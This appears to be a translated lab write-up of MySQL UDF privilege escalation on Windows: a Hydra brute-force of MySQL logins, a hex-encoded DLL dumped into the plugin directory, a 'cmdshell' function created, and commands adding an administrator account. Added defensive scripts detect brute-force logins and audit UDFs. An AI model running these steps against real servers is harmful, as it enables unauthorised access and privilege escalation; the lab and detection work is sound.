0428

```sql
CREATE USER 'n00p'@'localhost' IDENTIFIED BY 'n00p';
GRANT ALL PRIVILEGES ON *.* TO 'n00p'@'%' IDENTIFIED BY 'n00p' WITH GRANT OPTION;
FLUSH PRIVILEGES;
```
```bash
root@kali:~/dock# cat user.txt
root
n00p
root@kali:~/dock# cat pass.txt
root
n00p
root@kali:~/dock# hydra vic mysql -L user.txt -P pass.txt -V
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-04-27 23:23:55
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:2/p:2), ~1 try per task
[DATA] attacking mysql://vic:3306/
[ATTEMPT] target vic - login "root" - pass "root" - 1 of 4 [child 0] (0/0)
[ATTEMPT] target vic - login "root" - pass "n00p" - 2 of 4 [child 1] (0/0)
[ATTEMPT] target vic - login "n00p" - pass "root" - 3 of 4 [child 2] (0/0)
[ATTEMPT] target vic - login "n00p" - pass "n00p" - 4 of 4 [child 3] (0/0)
[3306][mysql] host: vic login: n00p password: n00p
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-04-27 23:23:55
```
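The hydra run above is exactly the pattern a defender wants to see in the server's own logs: several "Access denied" entries from one source host in a few seconds, spread over more than one user name. The following script is an added example, not part of the original write-up; it parses error-log lines in the MySQL 5.5 layout (`YYMMDD HH:MM:SS [Warning] Access denied for user 'u'@'h' ...`) and flags hosts that exceed a failure threshold inside a sliding window. The log lines are constructed for the example, and the threshold and window size are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in the MySQL 5.5 error-log layout (not from the page).
# Three failures from one host within the same second, one isolated failure
# from another host, and an unrelated [Note] line that must be ignored.
SAMPLE_LOG = """\
180427 23:23:55 [Warning] Access denied for user 'root'@'10.0.0.5' (using password: YES)
180427 23:23:55 [Warning] Access denied for user 'root'@'10.0.0.5' (using password: YES)
180427 23:23:55 [Warning] Access denied for user 'n00p'@'10.0.0.5' (using password: YES)
180427 23:30:01 [Warning] Access denied for user 'app'@'10.0.0.9' (using password: YES)
180427 23:45:12 [Note] /usr/sbin/mysqld: ready for connections.
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{6} +\d{1,2}:\d{2}:\d{2}) \[Warning\] Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<host>[^']*)'"
)


def parse_denied(text):
    """Yield (timestamp, user, host) for every 'Access denied' line in text."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # The 5.5 format pads single-digit hours with a space; collapse it.
        ts = datetime.strptime(" ".join(m.group("ts").split()), "%y%m%d %H:%M:%S")
        yield ts, m.group("user"), m.group("host")


def detect_bruteforce(text, threshold=3, window=timedelta(minutes=5)):
    """Return {host: (failure_count, sorted_user_list)} for every source host
    that produced at least `threshold` denied logins inside `window`.
    The count reported is the largest window seen for that host."""
    events = defaultdict(list)
    for ts, user, host in parse_denied(text):
        events[host].append((ts, user))

    alerts = {}
    for host, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it fits inside `window`.
            while evs[end][0] - evs[start][0] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                users = {u for _, u in evs[start:end + 1]}
                alerts[host] = (count, sorted(users))
    return alerts


if __name__ == "__main__":
    for host, (count, users) in detect_bruteforce(SAMPLE_LOG).items():
        print(f"ALERT {host}: {count} denied logins, users tried: {', '.join(users)}")
```

One caveat when deploying this: a 5.5-era server only writes "Access denied" lines to the error log when `log_warnings` is set to 2 or higher, so the audit setting has to be in place before the detection is worth anything.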
```sql
set @my_udf_a=concat('', <hex-encoded dll>);
mysql> use mysql;
Database changed
mysql> set @my_udf_a=concat('', <hex omitted here for brevity>);
Query OK, 0 rows affected (0.00 sec)
mysql> create table my_udf_data(data LONGBLOB);
Query OK, 0 rows affected (0.08 sec)
mysql> insert into my_udf_data values("");
Query OK, 1 row affected (0.00 sec)
```

### 2.8

```sql
mysql> update my_udf_data set data = @my_udf_a;
Query OK, 1 row affected (0.00 sec)
Rows matched: 1 Changed: 1 Warnings: 0
```
- MySQL < 5.0: the export path can be anywhere;
- 5.0 <= MySQL < 5.1: the dll must be exported to the target server's system directory (e.g. system32); otherwise the next step fails with the error "No paths allowed for shared library";
- MySQL > 5.1: the dll must be exported to the plugin directory, which can be shown with: `show variables like '%plugin%';`
```sql
mysql> select @@version;
+-----------+
| @@version |
+-----------+
| 5.5.53    |
+-----------+
1 row in set (0.01 sec)
mysql> show variables like '%plugin%';
+---------------+-------------------------------------------+
| Variable_name | Value                                     |
+---------------+-------------------------------------------+
| plugin_dir    | C:\phpStudy\PHPTutorial\MySQL\lib\plugin\ |
+---------------+-------------------------------------------+
1 row in set (0.01 sec)
```
At this step I ran into the problem that the plugin folder did not exist; since this was a test setup, I created the plugin folder on the target machine by hand.
```sql
mysql> select data from my_udf_data into DUMPFILE 'C:\phpStudy\PHPTutorial\MySQL\lib\plugin\n00p.dll';
1 - Can't create/write to file 'C:phpStudyPHPTutorialMySQLlibplugin
00p.dll' (Errcode: 22)
mysql> select data from my_udf_data into DUMPFILE 'C:/phpStudy/PHPTutorial/MySQL/lib/plugin/n00p.dll';
Query OK, 1 row affected (0.00 sec)
```
As the output above shows, single backslashes in the path are not preserved: they have to be written as single forward slashes or as double backslashes.
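The `Errcode: 22` message above is fully explained by how MySQL processes backslashes inside a quoted string literal: a recognised escape such as `\n` becomes the control character, and a backslash before any other character is simply dropped. The function below is an added example, not code from the write-up; it reimplements that escape handling (assuming the default sql_mode, i.e. without `NO_BACKSLASH_ESCAPES`) so the three spellings of the path can be compared. The path constant is the one from the page; nothing else is taken from it.

```python
# Escape sequences MySQL recognises inside a '...' or "..." string literal
# (default sql_mode). Any other backslash-character pair keeps only the character.
MYSQL_ESCAPES = {
    "0": "\0", "'": "'", '"': '"', "b": "\b", "n": "\n", "r": "\r",
    "t": "\t", "Z": "\x1a", "\\": "\\", "%": "\\%", "_": "\\_",
}

# The path exactly as typed in the failing DUMPFILE statement on the page.
PAGE_PATH = r"C:\phpStudy\PHPTutorial\MySQL\lib\plugin\n00p.dll"


def mysql_unescape(literal, backslash_escapes=True):
    """Return the string MySQL stores for the body of a quoted literal.

    With backslash_escapes=False the function models sql_mode
    NO_BACKSLASH_ESCAPES, under which a backslash is an ordinary character."""
    if not backslash_escapes:
        return literal
    out = []
    i = 0
    while i < len(literal):
        c = literal[i]
        if c == "\\" and i + 1 < len(literal):
            nxt = literal[i + 1]
            # Known escape -> its value; unknown escape -> the bare character.
            out.append(MYSQL_ESCAPES.get(nxt, nxt))
            i += 2
        else:
            out.append(c)
            i += 1
    return "".join(out)


def literal_forms(path):
    """Map each way of spelling a Windows path in a literal to what MySQL sees."""
    forms = {
        "single backslash": path,
        "double backslash": path.replace("\\", "\\\\"),
        "forward slash": path.replace("\\", "/"),
    }
    return {name: mysql_unescape(lit) for name, lit in forms.items()}


def survives_roundtrip(path):
    """True when the literal as written still names the intended file."""
    return mysql_unescape(path) == path


if __name__ == "__main__":
    for name, seen in literal_forms(PAGE_PATH).items():
        print(f"{name:17s} -> {seen!r}")
```

Running it shows the single-backslash form collapsing to `C:phpStudyPHPTutorialMySQLlibplugin` followed by a newline and `00p.dll`, which is character for character the file name in the server's error message; the double-backslash and forward-slash forms come through intact.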
```sql
mysql> create function cmdshell returns string soname 'n00p.dll';
Query OK, 0 rows affected (0.08 sec)
```
I am not sure why the output is garbled here, but the command was definitely executed; whether it succeeded can be verified shortly.
```sql
mysql> select cmdshell('net user n00p n00p /add');
+----------------------------------------------------------+
| cmdshell('net user n00p n00p /add')                      |
+----------------------------------------------------------+
| ����ɹ���ɡ�
--------------------------------------------���!
|
+----------------------------------------------------------+
1 row in set (0.41 sec)
mysql> select cmdshell('net localgroup administrators n00p /add');
+----------------------------------------------------------+
| cmdshell('net localgroup administrators n00p /add')      |
+----------------------------------------------------------+
| ����ɹ���ɡ�
--------------------------------------------���!
|
+----------------------------------------------------------+
1 row in set (0.05 sec)
```
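Every UDF registered with `create function ... soname` leaves a row in `mysql.func`, so the cheapest detective control for this whole chain is to compare that table against the libraries an operator knowingly installed. The script below is an added example, not part of the original post: it parses the `+---+` table layout the mysql client prints (the same layout as the `show variables` output above) and audits a `select * from mysql.func` result together with `plugin_dir` and `secure_file_priv`. Both tables are constructed samples; the `plugin_dir` value mirrors the page, while `vetted_udf.dll` and the allowlist are assumptions for the example.

```python
# Constructed sample of `select * from mysql.func` (mysql.func has the columns
# name, ret, dl, type). cmdshell/n00p.dll is the function created on the page;
# vetted_udf.dll is an assumed, operator-approved library.
FUNC_OUTPUT = r"""
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| cmdshell  | 0   | n00p.dll       | function |
| vetted_fn | 0   | vetted_udf.dll | function |
+-----------+-----+----------------+----------+
"""

# Constructed sample of `show variables` output for the two relevant variables.
# An empty secure_file_priv means INTO DUMPFILE/OUTFILE is not restricted to a directory.
VARS_OUTPUT = r"""
+------------------+-------------------------------------------+
| Variable_name    | Value                                     |
+------------------+-------------------------------------------+
| plugin_dir       | C:\phpStudy\PHPTutorial\MySQL\lib\plugin\ |
| secure_file_priv |                                           |
+------------------+-------------------------------------------+
"""


def parse_mysql_table(text):
    """Parse the mysql client's ASCII table into a list of dicts keyed by header.
    Separator lines start with '+' and are skipped; the first '|' line is the header."""
    lines = [l for l in text.splitlines() if l.lstrip().startswith("|")]
    if not lines:
        return []

    def cells(line):
        return [c.strip() for c in line.strip().strip("|").split("|")]

    header = cells(lines[0])
    return [dict(zip(header, cells(l))) for l in lines[1:]]


def audit_udf(func_table, vars_table, allowed_libs=()):
    """Return a list of findings: unexpected UDF libraries and a permissive
    secure_file_priv setting, which is what lets the dll be written in the first place."""
    findings = []
    variables = {r["Variable_name"]: r["Value"] for r in parse_mysql_table(vars_table)}
    plugin_dir = variables.get("plugin_dir", "")

    for row in parse_mysql_table(func_table):
        if row["dl"] not in allowed_libs:
            findings.append(
                f"unexpected UDF {row['name']} loaded from {plugin_dir}{row['dl']}"
            )

    if variables.get("secure_file_priv") == "":
        findings.append(
            "secure_file_priv is empty: SELECT ... INTO DUMPFILE can write anywhere "
            "the server account can"
        )
    return findings


if __name__ == "__main__":
    for finding in audit_udf(FUNC_OUTPUT, VARS_OUTPUT, allowed_libs=("vetted_udf.dll",)):
        print("FINDING:", finding)
```

The same parser works on the `show variables like '%plugin%'` block earlier on the page, so the findings can be produced from pasted client output without a live connection. Setting `secure_file_priv` to a dedicated directory (or NULL) and keeping `plugin_dir` unwritable for the account mysqld runs as closes the write step; the `mysql.func` check catches a library that was placed there by some other route.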
On the target machine, switch Apache to run as a service and add a low-privilege user, then grant that user read/write permission on the log files.
Double backslashes are used here, and the width attribute of the html element is changed so that the input box can display the full path.